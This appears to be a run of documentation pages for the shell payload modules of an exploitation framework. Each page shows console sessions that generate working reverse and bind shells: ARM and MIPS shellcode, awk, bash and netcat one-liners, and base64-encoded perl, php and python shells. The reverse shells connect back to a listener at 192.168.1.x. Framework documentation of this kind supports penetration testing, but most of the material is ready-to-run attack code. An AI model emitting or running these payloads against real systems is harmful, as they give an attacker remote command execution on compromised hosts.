"\x2f\x30\xa0\xe3\x62\x70\xa0\xe3\x07\x34\x83\xe0\x69\x70\xa0" "\xe3\x07\x38\x83\xe0\x6e\x70\xa0\xe3\x07\x3c\x83\xe0\x2f\x40" "\xa0\xe3\x73\x70\xa0\xe3\x07\x44\x84\xe0\x68\x70\xa0\xe3\x07" "\x48\x84\xe0\x73\x50\xa0\xe3\x68\x70\xa0\xe3\x07\x54\x85\xe0" "\x3e\x00\x2d\xe9\x08\x00\x8d\xe2\x00\x10\x8d\xe2\x04\x20\x8d" "\xe2\x0b\x00\x90\xef" ) ``` ================================================ FILE: docs/modules/payloads/armle/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for ARMLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/armle/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates armle reverse shell tcp payload ## Scenarios ``` rsf > rsf > use payloads/armle/reverse_tcp rsf (ARMLE Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (ARMLE Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (ARMLE Reverse TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f" "\x02\x19\x37\x01\xdf\x06\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf" "\x3f\x27\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92" "\x1a\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\x00\x10\xe1" "\xc0\xa8\x01\x04\x2f\x62\x69\x6e\x2f\x73\x68\x00" ) ``` ================================================ FILE: docs/modules/payloads/cmd/awk_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using awk one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/awk_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates awk tcp bind shell payload. ## Scenarios ``` rsf > use payloads/cmd/awk_bind_tcp rsf (Awk Bind TCP) > set rport 4321 [+] rport => 4321 rsf (Awk Bind TCP) > run [*] Running module... [*] Generating payload awk 'BEGIN{s="/inet/tcp/4321/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' ``` ================================================ FILE: docs/modules/payloads/cmd/awk_bind_udp.md ================================================ ## Description Module generates payload that creates interactive udp bind shell by using awk. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/awk_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates awk udp bind shell payload ## Scenarios ``` rsf > use payloads/cmd/awk_bind_udp rsf (Awk Bind UDP) > set rport 4321 [+] rport => 4321 rsf (Awk Bind UDP) > run [*] Running module... [*] Generating payload awk 'BEGIN{s="/inet/udp/4321/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' ``` ================================================ FILE: docs/modules/payloads/cmd/awk_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using awk one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/awk_reverse_tcp` 3. Do: `set lhost 192.168.1.3` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates awk tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/awk_reverse_tcp rsf (Awk Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Awk Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Awk Reverse TCP) > run [*] Running module... [*] Generating payload awk 'BEGIN{s="/inet/tcp/0/192.168.1.4/4321";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};' ``` ================================================ FILE: docs/modules/payloads/cmd/bash_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using bash one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/bash_reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates bash tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/bash_reverse_tcp rsf (Bash Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Bash Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Bash Reverse TCP) > run [*] Running module... [*] Generating payload bash -i >& /dev/tcp/192.168.1.4/4321 0>&1 ``` ================================================ FILE: docs/modules/payloads/cmd/netcat_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using netcat one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/netcat_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates netcat tcp bind shell payload. ## Scenarios ``` rsf > use payloads/cmd/netcat_bind_tcp rsf (Netcat Bind TCP) > set rport 4321 [+] rport => 4321 rsf (Netcat Bind TCP) > run [*] Running module... [*] Generating payload nc -lvp 4321 -e /bin/sh ``` ================================================ FILE: docs/modules/payloads/cmd/netcat_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using netcat one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/netcat_reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates netcat tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/netcat_reverse_tcp rsf (Netcat Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Netcat Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Netcat Reverse TCP) > run [*] Running module... [*] Generating payload nc 192.168.1.4 4321 -e /bin/sh ``` ================================================ FILE: docs/modules/payloads/cmd/perl_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using perl one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/perl_bind_udp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates perl tcp bind shell payload. ## Scenarios ``` rsf > use payloads/cmd/perl_bind_tcp rsf (Perl Bind TCP One-Liner) > set rport 4321 [+] rport => 4321 rsf (Perl Bind TCP One-Liner) > run [*] Running module... [*] Generating payload perl -MIO -e "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));" ``` ================================================ FILE: docs/modules/payloads/cmd/perl_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using perl one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/perl_reverse_tcp` 3. Do: `set lhost 192.168.1.3` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates perl tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/perl_reverse_tcp rsf (Perl Reverse TCP One-Liner) > set lhost 192.168.1.3 [+] lhost => 192.168.1.3 rsf (Perl Reverse TCP One-Liner) > set lport 4321 [+] lport => 4321 rsf (Perl Reverse TCP One-Liner) > run [*] Running module... [*] Generating payload perl -MIO -e "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));" ``` ================================================ FILE: docs/modules/payloads/cmd/php_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using php one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/php_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates php tcp bind shell payload ## Scenarios ``` rsf > use payloads/cmd/php_bind_tcp rsf (PHP Bind TCP One-Liner) > set rport 4321 [+] rport => 4321 rsf (PHP Bind TCP One-Liner) > run [*] Running module... [*] Generating payload php -r "eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));" ``` ================================================ FILE: docs/modules/payloads/cmd/php_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using php one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/php_reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates php tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/php_reverse_tcp rsf (PHP Reverse TCP One-Liner) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (PHP Reverse TCP One-Liner) > set lport 4321 [+] lport => 4321 rsf (PHP Reverse TCP One-Liner) > run [*] Running module... [*] Generating payload php -r "eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));" ``` ================================================ FILE: docs/modules/payloads/cmd/python_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using python one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/python_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates python tcp bind shell payload ## Scenarios ``` rsf > use payloads/cmd/python_bind_tcp rsf (Python Reverse TCP One-Liner) > set rport 4321 [+] rport => 4321 rsf (Python Reverse TCP One-Liner) > run [*] Running module... [*] Generating payload python -c "exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))" ``` ================================================ FILE: docs/modules/payloads/cmd/python_bind_udp.md ================================================ ## Description Module generates payload that creates interactive udp bind shell by using python one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/python_bind_udp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates python udp bind shell payload ## Scenarios ``` rsf > use payloads/cmd/python_bind_udp rsf (Python Bind UDP One-Liner) > set rport 4321 [+] rport => 4321 rsf (Python Bind UDP One-Liner) > run [*] Running module... [*] Generating payload python -c "exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))" ``` ================================================ FILE: docs/modules/payloads/cmd/python_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using python one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/python_reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates python udp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/python_reverse_tcp rsf (Python Reverse TCP One-Liner) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Python Reverse TCP One-Liner) > set lport 4321 [+] lport => 4321 rsf (Python Reverse TCP One-Liner) > run [*] Running module... [*] Generating payload python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))" ``` ================================================ FILE: docs/modules/payloads/cmd/python_reverse_udp.md ================================================ ## Description Module generates payload that creates interactive udp reverse shell by using python one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/python_reverse_udp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates python udp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/python_reverse_udp rsf (Python Reverse UDP One-Liner) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Python Reverse UDP One-Liner) > set lport 4321 [+] lport => 4321 rsf (Python Reverse UDP One-Liner) > run [*] Running module... [*] Generating payload python -c "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))" ``` ================================================ FILE: docs/modules/payloads/mipsbe/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for MIPSBE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/mipsbe/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates mipsbe bind shell tcp payload ## Scenarios ``` rsf > use payloads/mipsbe/bind_tcp rsf (MIPSBE Bind TCP) > set rport 4321 [+] rport => 4321 rsf (MIPSBE Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01\xc0\x28" "\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x30\x50" "\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\xff\xfd\x01" "\xa0\x68\x27\x01\xcd\x68\x04\x24\x0e\x10\xe1\x01\xae\x68\x25" "\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff" "\xec\x02\x10\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5" "\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25\x24" "\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02\x10\x20\x25" "\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01" "\x0c\xaf\xa2\xff\xff\x24\x11\xff\xfd\x02\x20\x88\x27\x8f\xa4" "\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24" "\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff" "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e" "\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4" "\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24" "\x02\x0f\xab\x01\x01\x01\x0c" ) ``` ================================================ FILE: docs/modules/payloads/mipsbe/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for MIPSBE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/mipsbe/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates mipsbe reverse shell tcp payload ## Scenarios ``` rsf > use payloads/mipsbe/reverse_tcp rsf (MIPSBE Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (MIPSBE Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (MIPSBE Reverse TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x28\x04\xff\xff\x24\x02\x0f\xa6\x01\x09\x09\x0c\x28\x04\x11" "\x11\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80" "\x20\x27\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01" "\x80\x20\x27\x01\x80\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57" "\x01\x09\x09\x0c\x30\x44\xff\xff\x24\x02\x0f\xc9\x01\x09\x09" "\x0c\x24\x02\x0f\xc9\x01\x09\x09\x0c\x3c\x05\x00\x02\x34\xa5" "\x10\xe1\xaf\xa5\xff\xf8\x3c\x05\xc0\xa8\x34\xa5\x01\x04\xaf" "\xa5\xff\xfc\x23\xa5\xff\xf8\x24\x0c\xff\xef\x01\x80\x30\x27" "\x24\x02\x10\x4a\x01\x09\x09\x0c\x3c\x08\x2f\x2f\x35\x08\x62" "\x69\xaf\xa8\xff\xec\x3c\x08\x6e\x2f\x35\x08\x73\x68\xaf\xa8" "\xff\xf0\x28\x07\xff\xff\xaf\xa7\xff\xf4\xaf\xa7\xff\xfc\x23" "\xa4\xff\xec\x23\xa8\xff\xec\xaf\xa8\xff\xf8\x23\xa5\xff\xf8" "\x27\xbd\xff\xec\x28\x06\xff\xff\x24\x02\x0f\xab\x00\x90\x93" "\x4c" ) ``` ================================================ FILE: docs/modules/payloads/mipsle/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for MIPSLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/mipsle/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates mipsle bind shell tcp payload ## Scenarios ``` rsf > use payloads/mipsle/bind_tcp rsf (MIPSLE Bind TCP) > set rport 4321 [+] rport => 4321 rsf (MIPSLE Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\xe0\xff\xbd\x27\xfd\xff\x0e\x24\x27\x20\xc0\x01\x27\x28\xc0" "\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff" "\x50\x30\xef\xff\x0e\x24\x27\x70\xc0\x01\x10\xe1\x0d\x24\x04" "\x68\xcd\x01\xfd\xff\x0e\x24\x27\x70\xc0\x01\x25\x68\xae\x01" "\xe0\xff\xad\xaf\xe4\xff\xa0\xaf\xe8\xff\xa0\xaf\xec\xff\xa0" "\xaf\x25\x20\x10\x02\xef\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff" "\xa5\x23\x49\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02\x01" "\x01\x05\x24\x4e\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02" "\xff\xff\x05\x28\xff\xff\x06\x28\x48\x10\x02\x24\x0c\x01\x01" "\x01\xff\xff\xa2\xaf\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff" "\xa4\x8f\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff" "\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff\x06\x28" "\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf\xaf\x73\x68\x0e" "\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf\xf4\xff\xa0\xaf\xec\xff" "\xa4\x27\xf8\xff\xa4\xaf\xfc\xff\xa0\xaf\xf8\xff\xa5\x27\xab" "\x0f\x02\x24\x0c\x01\x01\x01" ) ``` ================================================ FILE: docs/modules/payloads/mipsle/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for MIPSLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/mipsle/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates mipsle reverse shell tcp payload ## Scenarios ``` rsf > use payloads/mipsle/reverse_tcp rsf (MIPSLE Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (MIPSLE Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (MIPSLE Reverse TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04" "\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20" "\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27" "\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24" "\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09" "\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xe1\x05\x3c\x02\x00" "\xa5\x34\xf8\xff\xa5\xaf\x01\x04\x05\x3c\xc0\xa8\xa5\x34\xfc" "\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01" "\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08" "\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff" "\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec" "\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23" "\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09" "\x01" ) ``` ================================================ FILE: docs/modules/payloads/perl/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using perl. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/perl/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates perl tcp bind shell payload ## Scenarios ``` rsf > use payloads/perl/bind_tcp rsf (Perl Bind TCP) > set rport 4321 [+] rport => 4321 rsf (Perl Bind TCP) > run [*] Running module... [*] Generating payload use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs=')); ``` ================================================ FILE: docs/modules/payloads/perl/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using perl. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/perl/reverse_tcp` 3. Do: `set lhost 192.168.1.3` 3. Do: `set lport 4321` 4. Do: `run` 5. Module generates perl tcp reverse shell payload ## Scenarios ``` rsf > use payloads/perl/reverse_tcp rsf (Perl Reverse TCP) > set lhost 192.168.1.3 [+] lhost => 192.168.1.3 rsf (Perl Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Perl Reverse TCP) > run [*] Running module... [*] Generating payload use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow==')) ``` ================================================ FILE: docs/modules/payloads/php/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using php. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/php/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates php tcp bind shell payload ## Scenarios ``` rsf > use payloads/php/bind_tcp rsf (PHP Bind TCP) > set rport 4321 [+] rport => 4321 rsf (PHP Bind TCP) > run [*] Running module... [*] Generating payload eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ==')); ``` ================================================ FILE: docs/modules/payloads/php/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using php. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/php/reverse_udp` 3. Do: `set lhost 192.168.1.4` 3. Do: `set lport 4321` 4. Do: `run` 5. Module generates php tcp reverse shell payload ## Scenarios ``` rsf > use payloads/php/reverse_tcp rsf (PHP Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (PHP Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (PHP Reverse TCP) > run [*] Running module... [*] Generating payload eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ==')); ``` ================================================ FILE: docs/modules/payloads/python/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using python. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/python/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates python tcp bind shell payload ## Scenarios ``` rsf > use payloads/python/bind_tcp rsf (Python Bind TCP) > set rport 4321 [+] rport => 4321 rsf (Python Bind TCP) > run [*] Running module... [*] Generating payload exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64')) ``` ================================================ FILE: docs/modules/payloads/python/bind_udp.md ================================================ ## Description Module generates payload that creates interactive udp bind shell by using python. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/python/bind_udp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates python udp bind shell payload ## Scenarios ``` rsf > use payloads/python/bind_udp rsf (Python Bind UDP) > set rport 4321 [+] rport => 4321 rsf (Python Bind UDP) > run [*] Running module... [*] Generating payload 